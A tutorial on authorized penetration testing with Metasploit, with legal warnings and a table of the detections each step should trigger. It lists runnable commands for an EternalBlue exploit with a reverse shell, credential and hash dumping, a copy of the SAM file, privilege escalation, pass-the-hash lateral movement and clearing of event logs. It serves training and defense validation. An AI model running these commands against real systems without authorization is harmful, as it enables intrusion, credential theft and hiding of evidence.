How to Use Metasploit for Authorized Pentesting
Metasploit Framework is the standard toolkit for offensive security professionals. This guide covers conducting a structured penetration test on systems you have explicit written authorization to test. Every command here should only be run against infrastructure you own or have a signed Rules of Engagement document for.
Legal and ethical boundary: Unauthorized use of Metasploit constitutes unauthorized computer access — a felony in the US (CFAA), UK (Computer Misuse Act), EU, and nearly every other jurisdiction. Get written authorization before touching anything.
1. Install Metasploit Framework
# Kali Linux — pre-installed
msfconsole --version
# Ubuntu (official installer)
curl -s https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb | sudo tee /usr/local/bin/msfinstall
sudo chmod 755 /usr/local/bin/msfinstall
sudo msfinstall
# Initialize database (PostgreSQL)
sudo msfdb init
msfconsole
2. Engagement Workflow
A structured pentest follows these phases:
Reconnaissance → Scanning → Exploitation → Post-Exploitation → Reporting
Always document every action with timestamps. Use Metasploit’s workspaces to separate engagements.
3. Workspace Setup
msf6> workspace -a client_pentest_2026_03
msf6> workspace client_pentest_2026_03
msf6> workspace
* client_pentest_2026_03
default
Workspaces separate hosts, services, and loot by engagement.
4. Reconnaissance: Port Scanning
msf6> db_nmap -sV -sC -O -p 1-65535 192.168.100.0/24
# View discovered hosts
msf6> hosts
# View discovered services
msf6> services
# Filter by port
msf6> services -p 445
# Export for reporting
msf6> hosts -o /tmp/hosts.csv
msf6> services -o /tmp/services.csv
db_nmap runs nmap and automatically imports results into the database.
5. Search for Relevant Exploits
# Search by CVE
msf6> search cve:2021-34527 # PrintNightmare
msf6> search cve:2017-0144 # EternalBlue (MS17-010)
# Search by platform and type
msf6> search platform:windows type:exploit name:smb
# Search by service
msf6> search type:auxiliary name:ssh
# Check exploit score/reliability
msf6> info exploit/windows/smb/ms17_010_eternalblue
Exploit rankings: Excellent > Great > Good > Normal > Average > Low. Prefer Excellent or Great for production tests to minimize system instability.
6. Example: SMB Vulnerability Check (No Exploitation)
Before exploiting, confirm vulnerability exists:
msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6> set RHOSTS 192.168.100.0/24
msf6> set THREADS 10
msf6> run
# Output:
# [+] 192.168.100.15:445 - Host is likely VULNERABLE to MS17-010!
# [-] 192.168.100.16:445 - Host does NOT appear to be vulnerable.
7. Example: Exploitation with Meterpreter
After written confirmation to proceed beyond discovery:
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.100.15
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> set LHOST 192.168.100.1 # your attacker IP
msf6> set LPORT 4444
msf6> set VERBOSE true
# Preview what will happen before running
msf6> info
# Execute
msf6> run
If successful:
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
8. Post-Exploitation: Evidence Gathering
Collect evidence for the report — screenshots, hash dumps, configuration files:
meterpreter > screenshot # capture screen
meterpreter > ps # running processes
meterpreter > netstat # network connections
meterpreter > run post/multi/recon/local_exploit_suggester # privilege escalation suggestions
# Gather system info
meterpreter > run post/windows/gather/credentials/credential_collector
# Check for installed AV
meterpreter > run post/windows/gather/enum_av
# File search
meterpreter > search -f *.config -d C:\\
meterpreter > search -f *password* -d C:\\Users\\
# Download evidence file
meterpreter > download C:\\Windows\\System32\\config\\SAM /tmp/evidence/
9. Privilege Escalation
meterpreter > getsystem # automated local privilege escalation attempt
# If getsystem fails:
meterpreter > background
msf6> use post/multi/recon/local_exploit_suggester
msf6> set SESSION 1
msf6> run
# Try a suggested exploit
msf6> use exploit/windows/local/bypassuac_eventvwr
msf6> set SESSION 1
msf6> run
10. Lateral Movement (Authorized Scope Only)
Only attempt lateral movement to hosts explicitly included in the Rules of Engagement:
meterpreter > run post/windows/gather/credentials/hashdump
# Use captured hash for pass-the-hash against other hosts in scope
msf6> use exploit/windows/smb/psexec
msf6> set RHOSTS 192.168.100.20
msf6> set SMBUser Administrator
msf6> set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> run
11. Cleanup (Critical)
Leave systems exactly as you found them:
meterpreter > clearev # clear Windows event logs
# Note: clearing logs is visible to SIEM — discuss with client
# Remove any files you dropped
meterpreter > rm C:\\Windows\\Temp\\payload.exe
# Terminate sessions cleanly
meterpreter > exit
# Remove all handlers
msf6> sessions -K
# Back up and clear your workspace data
msf6> db_export -f xml /tmp/client_pentest_2026.xml
12. Generate a Report
# Export all findings to XML
msfconsole -q -x "workspace client_pentest_2026_03; \
db_export -f xml /tmp/pentest_data.xml; exit"
# Use Dradis (open-source pentest reporting tool) to build the report
sudo gem install dradis
# Recommended report structure:
# 1. Executive Summary
# 2. Scope and Methodology
# 3. Critical Findings (with CVSS scores, evidence screenshots)
# 4. High / Medium / Low Findings
# 5. Remediation Roadmap
# 6. Testing Timeline (every command, every timestamp)
Automation: Resource Scripts
Metasploit resource scripts automate repeated tasks:
# /tmp/smb_scan.rc
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS file:/tmp/targets.txt
set THREADS 20
run
exit
msfconsole -r /tmp/smb_scan.rc
Defense Correlation
Every action in this guide should be detectable. Use this to validate your defenses:
| Offensive Action | Expected Detection |
|---|---|
| db_nmap port scan | IDS alert, firewall log |
| EternalBlue exploit attempt | Snort/Suricata SMB rule |
| Meterpreter reverse shell | EDR process injection alert |
| hashdump | Wazuh Windows event 4624 + 4688 |
| clearev | Wazuh event 1102 (audit log cleared) |
Related Reading
- How to Use Nessus for Vulnerability Scanning
- How to Set Up Snort IDS on Linux
- How to Set Up Wazuh SIEM for Small Teams
Built by theluckystrike — More at zovo.one